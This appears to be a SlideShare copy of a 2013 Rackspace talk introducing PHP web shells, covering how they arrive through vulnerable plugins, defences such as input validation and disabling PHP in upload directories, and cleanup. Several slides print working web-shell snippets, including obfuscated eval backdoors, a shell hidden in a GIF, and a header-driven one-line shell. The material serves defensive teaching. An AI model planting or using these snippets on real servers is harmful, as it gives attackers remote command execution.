SlideShare a Scribd company logo

An introduction to php shells

Download as PPTX, PDF
R
RichieSM

This document discusses PHP shells, which are malicious files containing PHP functions used to run arbitrary commands supplied by attackers. PHP shells are usually delivered through exploited third-party plugins and are a threat as they allow attackers to compromise servers. The document provides tips on defending against PHP shells such as sanitizing user input, restricting PHP usage, and removing any shell files found on servers.

Presentations & Public SpeakingTechnology
1 of 20
An introduction to PHP shells Richard Mahoney, Developer Support Engineer Created by: Richard Mahoney Modified Date:09/05/2013 Classification: Public
RACKSPACE® HOSTING | WWW.RACKSPACE.COM About Me •PHP developer before becoming a Linux SysAdmin 6 years ago •Joined Rackspace in 2013 •Several years of experience with web app security •Is a Certified Ethical Hacker 2
RACKSPACE® HOSTING | WWW.RACKSPACE.COM About this presentation •What PHP shells are and why they exist •Where they come from •How to defend against the threat •Removal •Q & A 3
RACKSPACE® HOSTING | WWW.RACKSPACE.COM 4 So, what is a PHP shell?
RACKSPACE® HOSTING | WWW.RACKSPACE.COM What is a PHP shell? •A malicious file containing PHP functions such as eval() and shell_exec() •Accepts input via $_GET, $_POST, HTTP headers and even $_COOKIE •Usually obfuscated: eval(base64_decode('JF9HRVRbY10=')); •Used to run arbitrary commands supplied by the attacker •The most common variant is the C99 shell 5
RACKSPACE® HOSTING | WWW.RACKSPACE.COM How much of a threat? •Worst case: root compromise via a kernel exploit or simply by looking through files for passwords •But that's not really needed... •As the Apache user it can: •Be used to download, install and execute additional software to join IRC botnets or for Bitcoin mining •Steal data by using MySQL credentials found in PHP files •Host illegal material •Send out huge amounts of spam (very common) •Be used as a proxy for launching attacks on other servers, including those behind the same firewall 6
RACKSPACE® HOSTING | WWW.RACKSPACE.COM Here’s what one looks like 7
RACKSPACE® HOSTING | WWW.RACKSPACE.COM 8 How did it get onto my server?
RACKSPACE® HOSTING | WWW.RACKSPACE.COM Where did it come from? •The vast majority are via vulnerable third-party plugins for Wordpress, Joomla etc •Automated bots scan for the presence of these plugins and notify the attacker •The attacker then uploads the malicious code, typically to an /uploads or /media directory by exploiting the vulnerable website •The attacker visits the malicious shell script via a browser or by using a tool such as cURL •All of these steps could be scripted to continually compromise hosts and build a botnet •But, don't forget (S)FTP or your own code as an attack vector 9
RACKSPACE® HOSTING | WWW.RACKSPACE.COM 10 Defending against the threat
RACKSPACE® HOSTING | WWW.RACKSPACE.COM The golden rule •Never trust user input •Validate and sanitise as appropriate •The contents of $_GET, $_POST, $_FILES, $_COOKIE, $_SERVER, $_ENV, and HTTP headers should be considered unsafe •Use PHP functions such as filter_var() •Strip null bytes from filenames by using trim() •Check the contents of any file uploaded to the server. Do not rely on file extensions •Or even the first few bytes of it – malicious code can be embedded inside image files like this GIF: GIF89a^A???^A??????????????????!??^D^A????????????,????????????^A???^A??????^B^B D^A???;??? <?php @error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc']; if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIb ... 11
RACKSPACE® HOSTING | WWW.RACKSPACE.COM Another example •Grepping your codebase for strings like 'eval(' will result in a lot of hits in a standard Wordpress install due to it's use in Javascript libraries: root@www:/var/applications/example.com/public# grep 'eval(' * -R | wc -l 33 •But it's easy for an attacker to evade scans. This is a fully working PHP shell: <?php $_SERVER['HTTP_A']($_SERVER['HTTP_B']); ?> Where the HTTP header A is set to the string “eval”, and B can be any PHP function. 12
RACKSPACE® HOSTING | WWW.RACKSPACE.COM What else can I do? •Create a .htaccess file in any directories which shouldn't contain PHP code •In the contents: php_flag engine off •Ensure SFTP/FTP passwords are strong •Apache log files should be owned by root to prevent LFI (local file inclusion) attacks •Never run Apache as root •Install anti virus software and set it to scan on write 13
RACKSPACE® HOSTING | WWW.RACKSPACE.COM 14 Removal
RACKSPACE® HOSTING | WWW.RACKSPACE.COM Example of a compromised server This /images directory contains 3 PHP shells: [root@web1 images]# ls -l *.php -rw-r--r-- 1 apache apache 123617 Jun 19 16:09 404.php -rw-r--r-- 1 apache apache 11684 Jun 19 17:34 mlr2.php -rw-r--r-- 1 apache apache 24364 Jun 30 17:43 wso.php The contents: <?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BP U1RbJ2UnXSkpO2VjaG8gJzM3MzcyYjM3MzIyZTMyMzMzMDJlMzEzNTM4M2E3Njc4MzI2MzZiNzI2NTNl NzIzMzY1NjA2MzY4Jzs=')); ?> 15
RACKSPACE® HOSTING | WWW.RACKSPACE.COM Example of a compromised server Which evaluates to: if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo '37372b37322e3233302e3135383a767832636b72653e723365606368'; To make these safe, move them to somewhere like “/root/compromised_files” if you want to investigate further, or just delete them. If you can't/don't want to move the files, chmod to 000 and set the owner to root to disable access: [root@web1 images]# ls -l *.php ---------- 1 root root 123617 Jun 19 16:09 404.php ---------- 1 root root 11684 Jun 19 17:34 mlr2.php ---------- 1 root root 24364 Jun 30 17:43 wso.php 16
RACKSPACE® HOSTING | WWW.RACKSPACE.COM Next steps •Check for unusual files in places such as /tmp and /var/cache •Use “ls -la” to show hidden directories •Study the output of “lsof” •If malicious files owned by root are found, wipe the server and reinstall •Update all software on the server, including any CMS addons/plugins •Perform a virus scan 17
RACKSPACE® HOSTING | WWW.RACKSPACE.COM 18 Any Questions?
RACKSPACE® HOSTING | WWW.RACKSPACE.COM Further reading The Open Web Application Security Project – (OWASP) Top 10: owasp.org The PHP Security Guide: phpsec.org /r/Netsec: reddit.com/r/netsec 19
RACKSPACE® HOSTING | 5000 WALZEM ROAD | SAN ANTONIO, TX 78218 US SALES: 1-800-961-2888 | US SUPPORT: 1-800-961-4454 | WWW.RACKSPACE.COM RACKSPACE® HOSTING | © RACKSPACE US, INC. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COMRACKSPACE® HOSTING | © RACKSPACE US, INC. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COM RACKSPACE® HOSTING | 5 MILLINGTON ROAD | HAYES, UNITED KINGDOM UB3 4AZ UK SALES: +44 (0)20 8712 6507 | UK SUPPORT: 0800 988 0300 | WWW.RACKSPACE.CO.UK

Recommended

A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
Columbus WordCamp 2015
Columbus WordCamp 2015Columbus WordCamp 2015
Columbus WordCamp 2015
Jason Packer
 
Automatic testing and quality assurance for WordPress plugins and themes
Automatic testing and quality assurance for WordPress plugins and themesAutomatic testing and quality assurance for WordPress plugins and themes
Automatic testing and quality assurance for WordPress plugins and themes
Otto Kekäläinen
 
10 common cf server challenges
10 common cf server challenges10 common cf server challenges
10 common cf server challenges
ColdFusionConference
 
Badge Poser v3.0 - A DevOps Journey
Badge Poser v3.0 - A DevOps JourneyBadge Poser v3.0 - A DevOps Journey
Badge Poser v3.0 - A DevOps Journey
Fabio Cicerchia
 
10 things every developer should know about their database to run word press ...
10 things every developer should know about their database to run word press ...10 things every developer should know about their database to run word press ...
10 things every developer should know about their database to run word press ...
Otto Kekäläinen
 
My Database Skills Killed the Server
My Database Skills Killed the ServerMy Database Skills Killed the Server
My Database Skills Killed the Server
ColdFusionConference
 
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPVirtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Michael Coates
 

Recommended

A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
Columbus WordCamp 2015
Columbus WordCamp 2015Columbus WordCamp 2015
Columbus WordCamp 2015
Jason Packer
 
Automatic testing and quality assurance for WordPress plugins and themes
Automatic testing and quality assurance for WordPress plugins and themesAutomatic testing and quality assurance for WordPress plugins and themes
Automatic testing and quality assurance for WordPress plugins and themes
Otto Kekäläinen
 
10 common cf server challenges
10 common cf server challenges10 common cf server challenges
10 common cf server challenges
ColdFusionConference
 
Badge Poser v3.0 - A DevOps Journey
Badge Poser v3.0 - A DevOps JourneyBadge Poser v3.0 - A DevOps Journey
Badge Poser v3.0 - A DevOps Journey
Fabio Cicerchia
 
10 things every developer should know about their database to run word press ...
10 things every developer should know about their database to run word press ...10 things every developer should know about their database to run word press ...
10 things every developer should know about their database to run word press ...
Otto Kekäläinen
 
My Database Skills Killed the Server
My Database Skills Killed the ServerMy Database Skills Killed the Server
My Database Skills Killed the Server
ColdFusionConference
 
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPVirtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Michael Coates
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
Soroush Dalili
 
Modern PHP Ch7 Provisioning Guide 導讀
Modern PHP Ch7 Provisioning Guide 導讀Modern PHP Ch7 Provisioning Guide 導讀
Modern PHP Ch7 Provisioning Guide 導讀
Chen Cheng-Wei
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invaders
Vladimír Smitka
 
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
PROIDEA
 
SimpleTestによるPHPのテスト
SimpleTestによるPHPのテストSimpleTestによるPHPのテスト
SimpleTestによるPHPのテスト
gutskun
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
Joe Slowik
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingTools
Yury Chemerkin
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store apps
Csaba Fitzl
 
20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanisms20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanisms
Csaba Fitzl
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOS
Csaba Fitzl
 
Antivirus Bypass Techniques - 2016
Antivirus Bypass Techniques - 2016Antivirus Bypass Techniques - 2016
Antivirus Bypass Techniques - 2016
Raghav Bisht
 
Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!
WordCamp Cape Town
 
Appsec DC - wXf -2010
Appsec DC - wXf -2010Appsec DC - wXf -2010
Appsec DC - wXf -2010
Chris Gates
 
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Zabbix
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfest
Csaba Fitzl
 
Seravo.com: WordPress Security 101
Seravo.com: WordPress Security 101Seravo.com: WordPress Security 101
Seravo.com: WordPress Security 101
Seravo
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
Michele Orru
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
Chris Gates
 
大众点评网 Web开发之路
大众点评网 Web开发之路大众点评网 Web开发之路
大众点评网 Web开发之路
alcoholwang
 
Monografia Adauto2008
Monografia Adauto2008Monografia Adauto2008
Monografia Adauto2008
Correios
 

More Related Content

What's hot

How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
Soroush Dalili
 
Modern PHP Ch7 Provisioning Guide 導讀
Modern PHP Ch7 Provisioning Guide 導讀Modern PHP Ch7 Provisioning Guide 導讀
Modern PHP Ch7 Provisioning Guide 導讀
Chen Cheng-Wei
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invaders
Vladimír Smitka
 
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
PROIDEA
 
SimpleTestによるPHPのテスト
SimpleTestによるPHPのテストSimpleTestによるPHPのテスト
SimpleTestによるPHPのテスト
gutskun
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
Joe Slowik
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingTools
Yury Chemerkin
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store apps
Csaba Fitzl
 
20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanisms20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanisms
Csaba Fitzl
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOS
Csaba Fitzl
 
Antivirus Bypass Techniques - 2016
Antivirus Bypass Techniques - 2016Antivirus Bypass Techniques - 2016
Antivirus Bypass Techniques - 2016
Raghav Bisht
 
Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!
WordCamp Cape Town
 
Appsec DC - wXf -2010
Appsec DC - wXf -2010Appsec DC - wXf -2010
Appsec DC - wXf -2010
Chris Gates
 
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Zabbix
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfest
Csaba Fitzl
 
Seravo.com: WordPress Security 101
Seravo.com: WordPress Security 101Seravo.com: WordPress Security 101
Seravo.com: WordPress Security 101
Seravo
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
Michele Orru
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
Chris Gates
 

What's hot (20)

How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
Modern PHP Ch7 Provisioning Guide 導讀
Modern PHP Ch7 Provisioning Guide 導讀Modern PHP Ch7 Provisioning Guide 導讀
Modern PHP Ch7 Provisioning Guide 導讀
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invaders
 
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
 
SimpleTestによるPHPのテスト
SimpleTestによるPHPのテストSimpleTestによるPHPのテスト
SimpleTestによるPHPのテスト
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingTools
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store apps
 
20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanisms20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanisms
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOS
 
Antivirus Bypass Techniques - 2016
Antivirus Bypass Techniques - 2016Antivirus Bypass Techniques - 2016
Antivirus Bypass Techniques - 2016
 
Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!Anthony Somerset - Site Speed = Success!
Anthony Somerset - Site Speed = Success!
 
Appsec DC - wXf -2010
Appsec DC - wXf -2010Appsec DC - wXf -2010
Appsec DC - wXf -2010
 
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
Jean-Baptiste Favre - How to Monitor Bilions of Miles Shared by 20 Million Us...
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfest
 
Seravo.com: WordPress Security 101
Seravo.com: WordPress Security 101Seravo.com: WordPress Security 101
Seravo.com: WordPress Security 101
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 

Viewers also liked

大众点评网 Web开发之路
大众点评网 Web开发之路大众点评网 Web开发之路
大众点评网 Web开发之路
alcoholwang
 
Monografia Adauto2008
Monografia Adauto2008Monografia Adauto2008
Monografia Adauto2008
Correios
 
iscsid remains stopped in redhat EL 6
iscsid remains stopped in redhat EL 6iscsid remains stopped in redhat EL 6
iscsid remains stopped in redhat EL 6
Ashwin Pawar
 
Embedded Android Workshop at ABS 2014
Embedded Android Workshop at ABS 2014Embedded Android Workshop at ABS 2014
Embedded Android Workshop at ABS 2014
Opersys inc.
 
Anonos U.S. Patent Number 9,087,216
Anonos U.S. Patent Number 9,087,216Anonos U.S. Patent Number 9,087,216
Anonos U.S. Patent Number 9,087,216
Ted Myerson
 
Running ColdFusion MX 7 on Linux and Unix
Running ColdFusion MX 7 on Linux and UnixRunning ColdFusion MX 7 on Linux and Unix
Running ColdFusion MX 7 on Linux and Unix
Steven Erat
 
Smart viewreporter
Smart viewreporterSmart viewreporter
Smart viewreporter
sagarsethi87
 
Filelist
FilelistFilelist
Filelist
trinhhuusam
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web Applications
Sasha Goldshtein
 
Information Gathering 2
Information Gathering 2Information Gathering 2
Information Gathering 2
Aero Plane
 
03 - Aplicações web com ASP.net v1.0
03 - Aplicações web com ASP.net v1.003 - Aplicações web com ASP.net v1.0
03 - Aplicações web com ASP.net v1.0
César Augusto Pessôa
 
[Did you know] 모바일 전략과 웹앱 20130703
[Did you know] 모바일 전략과 웹앱 20130703[Did you know] 모바일 전략과 웹앱 20130703
[Did you know] 모바일 전략과 웹앱 20130703
doo rip choi
 
Hybrid kernel
Hybrid kernelHybrid kernel
Hybrid kernel
Abu Azzam
 
Paolo Dal Checco, Alessandro Rossetti, Stefano Fratepietro - DEFT 7 Manual
Paolo Dal Checco, Alessandro Rossetti, Stefano Fratepietro - DEFT 7 ManualPaolo Dal Checco, Alessandro Rossetti, Stefano Fratepietro - DEFT 7 Manual
Paolo Dal Checco, Alessandro Rossetti, Stefano Fratepietro - DEFT 7 Manual
Sandro Rossetti
 
Art and Science of Web Sites Performance: A Front-end Approach
Art and Science of Web Sites Performance: A Front-end ApproachArt and Science of Web Sites Performance: A Front-end Approach
Art and Science of Web Sites Performance: A Front-end Approach
Jiang Zhu
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP security
ERPScan
 
Surviving a BYOD Implementation
Surviving a BYOD ImplementationSurviving a BYOD Implementation
Surviving a BYOD Implementation
Diana Benner
 
Road to Government 2.0: Technological Problems and Solutions for Transparency...
Road to Government 2.0: Technological Problems and Solutions for Transparency...Road to Government 2.0: Technological Problems and Solutions for Transparency...
Road to Government 2.0: Technological Problems and Solutions for Transparency...
Daniel X. O'Neil
 
The Implausibility of Secrecy - Mark Fenster - Author - University of Florid...
The Implausibility of Secrecy - Mark Fenster - Author - University of Florid...The Implausibility of Secrecy - Mark Fenster - Author - University of Florid...
The Implausibility of Secrecy - Mark Fenster - Author - University of Florid...
Linda Cadigan
 
Linux
Linux Linux
Linux
mazenetsolution
 

Viewers also liked (20)

大众点评网 Web开发之路
大众点评网 Web开发之路大众点评网 Web开发之路
大众点评网 Web开发之路
 
Monografia Adauto2008
Monografia Adauto2008Monografia Adauto2008
Monografia Adauto2008
 
iscsid remains stopped in redhat EL 6
iscsid remains stopped in redhat EL 6iscsid remains stopped in redhat EL 6
iscsid remains stopped in redhat EL 6
 
Embedded Android Workshop at ABS 2014
Embedded Android Workshop at ABS 2014Embedded Android Workshop at ABS 2014
Embedded Android Workshop at ABS 2014
 
Anonos U.S. Patent Number 9,087,216
Anonos U.S. Patent Number 9,087,216Anonos U.S. Patent Number 9,087,216
Anonos U.S. Patent Number 9,087,216
 
Running ColdFusion MX 7 on Linux and Unix
Running ColdFusion MX 7 on Linux and UnixRunning ColdFusion MX 7 on Linux and Unix
Running ColdFusion MX 7 on Linux and Unix
 
Smart viewreporter
Smart viewreporterSmart viewreporter
Smart viewreporter
 
Filelist
FilelistFilelist
Filelist
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web Applications
 
Information Gathering 2
Information Gathering 2Information Gathering 2
Information Gathering 2
 
03 - Aplicações web com ASP.net v1.0
03 - Aplicações web com ASP.net v1.003 - Aplicações web com ASP.net v1.0
03 - Aplicações web com ASP.net v1.0
 
[Did you know] 모바일 전략과 웹앱 20130703
[Did you know] 모바일 전략과 웹앱 20130703[Did you know] 모바일 전략과 웹앱 20130703
[Did you know] 모바일 전략과 웹앱 20130703
 
Hybrid kernel
Hybrid kernelHybrid kernel
Hybrid kernel
 
Paolo Dal Checco, Alessandro Rossetti, Stefano Fratepietro - DEFT 7 Manual
Paolo Dal Checco, Alessandro Rossetti, Stefano Fratepietro - DEFT 7 ManualPaolo Dal Checco, Alessandro Rossetti, Stefano Fratepietro - DEFT 7 Manual
Paolo Dal Checco, Alessandro Rossetti, Stefano Fratepietro - DEFT 7 Manual
 
Art and Science of Web Sites Performance: A Front-end Approach
Art and Science of Web Sites Performance: A Front-end ApproachArt and Science of Web Sites Performance: A Front-end Approach
Art and Science of Web Sites Performance: A Front-end Approach
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP security
 
Surviving a BYOD Implementation
Surviving a BYOD ImplementationSurviving a BYOD Implementation
Surviving a BYOD Implementation
 
Road to Government 2.0: Technological Problems and Solutions for Transparency...
Road to Government 2.0: Technological Problems and Solutions for Transparency...Road to Government 2.0: Technological Problems and Solutions for Transparency...
Road to Government 2.0: Technological Problems and Solutions for Transparency...
 
The Implausibility of Secrecy - Mark Fenster - Author - University of Florid...
The Implausibility of Secrecy - Mark Fenster - Author - University of Florid...The Implausibility of Secrecy - Mark Fenster - Author - University of Florid...
The Implausibility of Secrecy - Mark Fenster - Author - University of Florid...
 
Linux
Linux Linux
Linux
 

Similar to An introduction to php shells

Securing Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep SharmaSecuring Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep Sharma
OSSCube
 
hardenning Operating System Server Berbasis Linux
hardenning Operating System Server Berbasis Linuxhardenning Operating System Server Berbasis Linux
hardenning Operating System Server Berbasis Linux
jokerman16
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
InfosecTrain
 
Denis Baranov - Root via XSS
Denis Baranov - Root via XSSDenis Baranov - Root via XSS
Denis Baranov - Root via XSS
DefconRussia
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
Narudom Roongsiriwong, CISSP
 
Loose Lips Sink Ships: Why Your Application Tells Me How to Hack It
Loose Lips Sink Ships: Why Your Application Tells Me How to Hack ItLoose Lips Sink Ships: Why Your Application Tells Me How to Hack It
Loose Lips Sink Ships: Why Your Application Tells Me How to Hack It
JeremyRyanKelso
 
Create dynamic sites with PHP & MySQL
Create dynamic sites with PHP & MySQLCreate dynamic sites with PHP & MySQL
Create dynamic sites with PHP & MySQL
kangaro10a
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?
Nathan Van Gheem
 
Docker for Developers - PNWPHP 2016 Workshop
Docker for Developers - PNWPHP 2016 WorkshopDocker for Developers - PNWPHP 2016 Workshop
Docker for Developers - PNWPHP 2016 Workshop
Chris Tankersley
 
Developing and Deploying PHP with Docker
Developing and Deploying PHP with DockerDeveloping and Deploying PHP with Docker
Developing and Deploying PHP with Docker
Patrick Mizer
 
Apache
ApacheApache
Apache
Fathima Ashraf
 
Securing Your Web Server
Securing Your Web ServerSecuring Your Web Server
Securing Your Web Server
manugoel2003
 
DevOps in PHP environment
DevOps in PHP environment DevOps in PHP environment
DevOps in PHP environment
Evaldo Felipe
 
How to Secure Your WordPress Site
How to Secure Your WordPress SiteHow to Secure Your WordPress Site
How to Secure Your WordPress Site
QBurst
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
Raghav Bisht
 
Laravel Forge: Hello World to Hello Production
Laravel Forge: Hello World to Hello ProductionLaravel Forge: Hello World to Hello Production
Laravel Forge: Hello World to Hello Production
Joe Ferguson
 
PHP Dependency Management with Composer
PHP Dependency Management with ComposerPHP Dependency Management with Composer
PHP Dependency Management with Composer
Adam Englander
 
Lecture11_LaravelGetStarted_SPring2023.pdf
Lecture11_LaravelGetStarted_SPring2023.pdfLecture11_LaravelGetStarted_SPring2023.pdf
Lecture11_LaravelGetStarted_SPring2023.pdf
ShaimaaMohamedGalal
 
WordPress Security and Best Practices
WordPress Security and Best PracticesWordPress Security and Best Practices
WordPress Security and Best Practices
Robert Vidal
 
Bz backtrack.usage
Bz backtrack.usageBz backtrack.usage
Bz backtrack.usage
djenoalbania
 

Similar to An introduction to php shells (20)

Securing Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep SharmaSecuring Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep Sharma
 
hardenning Operating System Server Berbasis Linux
hardenning Operating System Server Berbasis Linuxhardenning Operating System Server Berbasis Linux
hardenning Operating System Server Berbasis Linux
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
Denis Baranov - Root via XSS
Denis Baranov - Root via XSSDenis Baranov - Root via XSS
Denis Baranov - Root via XSS
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
 
Loose Lips Sink Ships: Why Your Application Tells Me How to Hack It
Loose Lips Sink Ships: Why Your Application Tells Me How to Hack ItLoose Lips Sink Ships: Why Your Application Tells Me How to Hack It
